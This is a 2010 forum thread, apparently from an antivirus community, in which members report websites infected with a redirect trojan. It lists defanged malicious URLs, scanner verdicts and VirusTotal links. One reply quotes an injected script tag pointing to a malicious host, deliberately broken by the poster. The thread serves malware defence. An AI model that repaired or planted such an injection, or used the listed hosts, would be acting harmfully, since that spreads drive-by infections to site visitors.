Author Topic: Source of infection... (Read 13487 times)

polonus · « **on:** May 26, 2010, 10:18:12 PM »

Hi malware fighters,

This following site is a redirect for infection of the site mentioned below: http://www.UnmaskParasites.com/security-report/?page=n9uo.com
403. Forbidden

http://safeweb.norton.com/report/show?url=grantsalert.com%2F&x=10&y=8
What is there: Total threats on this site: 38 all instances of Trojan.Malscript!html
Of the 105 pages we tested on the site over the past 90 days, 88 pages resulted in malicious software being downloaded and installed without user consent, and the last time suspicious content was found on this site was on 2010-05-13.

Malicious software includes 91 scripting exploits. Successful infection resulted in an average of 2 new processes on the target machine.

Malicious software is hosted on 2 domain(s), including n9uo*com/, sio3*cn/.
See: http://safeweb.norton.com/report/show?url=sio3.cn&x=0&y=0
http://jsunpack.jeek.org/dec/go?report=61cfc9179bfe18905d4daa6a25cac414df04c50c

1 domain appear to be functioning as intermediaries for distributing malware to visitors of this site, including holeinone*com.tw/,

polonus

polonus · « **Reply #1 on:** June 15, 2010, 12:33:54 AM »

Hi malware fighters,

Similar malcode also detected here:

Threat Name:    Trojan.Malscript!html
Location:    htxp://www.fear-crew-team.yoyo.pl/eacbdf/kmartemploymentapplications.html


Threat Name:    Trojan.Malscript!html
Location:    htxp://www.fear-crew-team.yoyo.pl/eacbdf/americanpageanttest.html


Threat Name:    Trojan.Malscript!html
Location:    htxp://www.fear-crew-team.yoyo.pl/eacbdf/taperfadehaircuts.html


Threat Name:    Trojan.Malscript!html
Location:    htxp://www.fear-crew-team.yoyo.pl/eacbdf/dibujosdepreciousmomentsparapintar.html


Threat Name:    Trojan.Malscript!html
Location:    htxp://www.fear-crew-team.yoyo.pl/eacbdf/mydisholivegardennetwork.html


Threat Name:    Trojan.Malscript!html
Location:    htxp://www.fear-crew-team.yoyo.pl/eacbdf/graffitidrawingletter.html


Threat Name:    Trojan.Malscript!html
Location:    htxp://www.fear-crew-team.yoyo.pl/eacbdf/picturesofeastcoastryders.html


Threat Name:    Trojan.Malscript!html
Location:    htxp://www.fear-crew-team.yoyo.pl/eacbdf/picturesofbraids.html


Threat Name:    Trojan.Malscript!html
Location:    htxp://www.fear-crew-team.yoyo.pl/eacbdf/trillfamadioslyrics.html


Threat Name:    Trojan.Malscript!html
Location:    htxp://www.fear-crew-team.yoyo.pl/eacbdf/myspaceoverlayeditors.html\\

Description here: htxp://traversecode.com/2009/12/29/trojan-malscripthtml/ (Is flagged by avast shield)

Avast detects this as: JS:Redirector-B (trj)

and an additional suspicious link found here: sexfunbeach.com suspicious ↗ - displaying 1 of 1

* <Script> link - htxp://sexfunbeach.com/blogs/moms/wp-content/plugins/index.php
Malicious software includes 42 exploit(s), 19 trojan(s), 6 scripting exploit(s).

Malicious software is hosted on 3 domains, including traffloads.in/, asfirey.net/, gumblar.cn/.

This site was hosted on 1 network(s) including AS6428 (CDM).

Has this site acted as an intermediary resulting in further distribution of malware?

Over the past sexfunbeach.com appeared to function as an intermediary for the infection of 6 sites including savemyporn.com/, siscon.com.br/, smutboxxx.com/.

Has this site hosted malware?

Yes, this site has hosted malicious software over the past 90 days. It infected 38 domain(s), including savemyporn.com/, smutboxxx.com/, sp-plan.co.jp/.

The nature of the content of the sites are a guarantee almost for added malware,
so stay away from/clear of pr0n sites,

polonus

Pondus · « **Reply #2 on:** June 15, 2010, 01:01:04 AM »

VirusTotal - kmartemploymentapplications.html - 19/41
http://www.virustotal.com/analisis/ddfc3f3f242af192a2ef144bd994fa20948a75c44ce9a02ee5c2e08cb77d3867-1276555748

VirusTotal - trojan-malscripthtml.htm - 6/40
http://www.virustotal.com/analisis/e0d515af6d53831a794995b530846986894666afcc5cdf6be32cf06c3025edfd-1276555971

VirusTotal - index.php - 15/41
http://www.virustotal.com/analisis/fc74a7e9494ca42a36e867e8070a6b3377938e923e8f197997eb85d5aa4f0f82-1276556360

polonus · « **Reply #3 on:** June 15, 2010, 06:35:55 PM »

Another site with this malware found:
#

Threat Name: Trojan.Malscript!html
Location: htxp://astoncartersolicitors.com/
#

Threat Name: Trojan.Malscript!html
Location: htxp://astoncartersolicitors.com/index.html

Blocked by finjan: see the alert given attached/ShowBlock.aspx?transid=4C16F4ED

polonus

Pondus · « **Reply #4 on:** June 15, 2010, 11:00:32 PM »

VirusTotal - index.html - 28/41
http://www.virustotal.com/analisis/961af977b5acbe7f901ff2c7e90fe3d3938a25772ee1ad393453fc998d3d29b9-1276620205

polonus · « **Reply #5 on:** June 16, 2010, 05:04:35 PM »

Hi malware fighters,

Another one found here:
Threat Name:    Trojan.Malscript!html
Location:    hxtp://www.kindergarten-zielstrasse.de/
finjan found: JS/Redirector-u aka JS/Dropper aka Trojan-Downloader.JS.Pegel.ac A

This does not find it: http://wepawet.iseclab.org/view.php?hash=f7f4353f6be53dfe63e3a2cf00b0b46e&t=1276699724&type=js
But what is: htxp://bestdarkstar.info:8080/google.com/imeem.com/ign.com.php   NXDOMAIN   application/x-empty
A known Joomla exploit and appearing in this blocklist: http://doc.emergingthreats.net/pub/Main/HoneywallSamples/hosts

polonus · « **Reply #6 on:** June 16, 2010, 08:16:37 PM »

Hi malware fighters,

And another one here:
labradory_krakow.republika.pl
Domain Hash    ad873cf7c1d8d47dbdacfa4b1815def1
IP Address    213.180.128.160
IP Hostname    gwiazdka.republika.pl
IP Country    PL (Poland)
AS Number    12990
AS Name    ONET-PL-AS1 Onet.pl portal network
Detections    4 / 18 (22 %)
Status    DANGEROUS
Threat Name:      Trojan.Malscript!html
Location:    htxp://labradory_krakow.republika.pl/
2 suspicious inline scripts found.
Moreover, Google currently lists this page as suspicious*
   Malicious software includes 2 exploits, 1 scripting exploits, 1 trojan - Troj/Iframe/DY
HTML/Crypted.Gen aka JS/Redir.AQ
Successful infection resulted in an average of 1 new process on the target machine.

   Malicious software is hosted on 7 domains, including searchfunes.org/, mobi-print.com/, adingurj.com/.

   2 domains appear to be functioning as intermediaries for distributing malware to visitors of this site, including scaraori.com/, eplarine.com/.

   This site was hosted on 1 network(s) including AS5617 (Polish Telecom).

Has this site acted as an intermediary resulting in further distribution of malware?

   Over the past months labradory_krakow.republika.pl appeared to function as an intermediary for the infection of 3 sites including mojpupil.pl/, labrador.toplista.pl/, hodowle.top-100.pl/,
also see WOT: http://www.mywot.com/en/scorecard/labrador.toplista.pl

Read up about the code shown as an attached image:
http://stackoverflow.com/questions/1224670/what-is-the-advantage-of-using-unescape-on-document-write-to-load-javacript

polonus

Pondus · « **Reply #7 on:** June 16, 2010, 09:19:54 PM »

VirusTotal - kindergarten-zielstrasse.de.h - 25/41
http://www.virustotal.com/analisis/3666630390052874be3013cbaecf9310c7bcb6f2cb861520f8fb848fadd241c5-1276715747

VirusTotal - labradory_krakow.republika.pl.htm - 7/41
http://www.virustotal.com/analisis/92afaef392ff6077b74feffc6b2ddca0833680bbb05bbcb9ceea9652a64ff0a9-1276715754

polonus · « **Reply #8 on:** June 16, 2010, 10:37:30 PM »

Hi Pondus,

According to the second results, avast need detection there..
But according to the statistics here, avast detection rate for the malware should be 38%:
http://lists.clean-mx.com/clean-mx/md5.php?F_Prot=JS/Redir.AQ

pol

polonus · « **Reply #9 on:** June 17, 2010, 12:31:58 AM »

Hi malware fighters,

And what do you think 61 instances of it here: http://www.browserdefender.com/site/fear-crew-team.yoyo.pl/

Same trojan,

pol

polonus · « **Reply #10 on:** June 19, 2010, 11:16:17 PM »

Hi Pondus,

Now a Norwegian site that has this infection:
webactive24*at
Domain Hash    b4a0ff422b989a8d382f1fbe8c5d2b0a
IP Address    213.188.130.108
IP Hostname    linuxnl-www.active24.nl
IP Country    NO (Norway)
AS Number    12994
AS Name    Active ISP AS
Detections    7 / 19 (37 %)
Status    DANGEROUS

Virus
Threat Name:    Trojan.Malscript!html
Location:    htxp://www.webactive24.at/

Drive-By Downloads
Threat Name:    Trojan.Malscript!html
File name:    c:\documents and settings\user\local settings\temporary internet files\content.ie5\ocieqgj3\webactive24[1].htm
Location:    htxp://webactive24.at/

See the attached image of the malcode...
for lasio.ru see: http://www.google.com/safebrowsing/diagnostic?site=lasio.ru

polonus

Pondus · « **Reply #11 on:** June 19, 2010, 11:47:34 PM »

VirusTotal - webactive24.at.htm - 28/41 ( Edit: WebSite is now CLEANED )
http://www.virustotal.com/analisis/5da6c6da967a4cb143a46ad9c27b9150e9d8435850064bc8ced16ca86d55f8ab-1276983902

polonus · « **Reply #12 on:** June 27, 2010, 03:03:09 PM »

Hi another site with malscript infection found, this time Czech site:

Threat Name:    Trojan.Malscript!html
Location: hxtp://www.krach-cz.cz/index.htm
Analysis: htxp://jsunpack.jeek.org/dec/go?report=636f126aa098d95c0adaa1df68f0abfdcab909c4
Found benign here, but is infected with Troj/JSRedir-AK
http://wepawet.iseclab.org/view.php?hash=ef241bff79db6f86ab6377f253308307&t=1277643265&type=js
Location:     hxtp://www.krach-cz.cz/
Our avast av detects JS-Illredir-H here,

polonus

polonus · « **Reply #13 on:** June 30, 2010, 01:54:19 PM »

Howdy malware fighters,

Here a list of dangerous subdomains:
http://safeweb.norton.com/report/show?url=oployau.fancountblogger.com.&x=13&y=10

sorydory.russellhowe.com. 3530 IN A 88.198.25.170
Threat Name:    Bloodhound.Exploit.292
Location:    htxp://sorydory.russellhowe.com:8080/Applet1.html

aospfpgy.dogplaystation.com. 2792 IN A 216.154.216.15
hreat Name:     Bloodhound.Exploit.292
Location:    htxp://aospfpgy.dogplaystation.com:8080/Applet1.html

kollinsoy.skyefenton.com. 399 IN A 194.150.236.199
Threat Name:     Trojan.Malscript!html
Location:    hxtp://kollinsoy.skyefenton.com:8080/HDMI.js

temp.hbsouthmomsclub.com. 1116 IN A 81.89.109.23
Threat Name:    Trojan.Malscript!html
Location:    htxp://temp.hbsouthmomsclub.com:8080/Notes1.pdf

The attack itself is nothing new. It uses stolen FTP credentials to inject malicious scripts into legitimate web pages. The injected scripts look like this:

Code: [Select]

 ^sc ript type="text/javascript" src="hxxp://oployau .fancountblogger .com:8080/YouTube*js"^^/sc ript^
<!--8469f3ebb36bebb12b39b0f9e7fe5933--^ code broken by me, pol

polonus

polonus · « **Reply #14 on:** July 08, 2010, 10:29:02 PM »

Hi malware fighters,

Another one: Threats found: 1
Here is a complete list:
Threat Name: Trojan.Malscript!html
Location: htxp://ee9kd.smartenergymodel.com/js/jquery.min.js
The last time suspicious content was found on this site was on 2010-07-08.
Malicious software includes 4 trojans, 4 exploits

This site was hosted on 2 network(s) including AS27473 (CIHOST), AS16276 (OVH).

Has this site acted as an intermediary resulting in further distribution of malware?

Over the past 90 days, smartenergymodel.com appeared to function as an intermediary for the infection of 25 sitex including joby.cz/, cherokeestreetnews.org/, dixiequicks.com/.

Has this site hosted malware?

Yes, this site has hosted malicious software over the past 90 days. It infected 932 domains, including prettymematernity.com/, balioutbound.com/, turkescort.gen.tr/.

How did this happen?

In some cases, third parties can add malicious code to legitimate sites, which would cause us to show the warning message,

polonus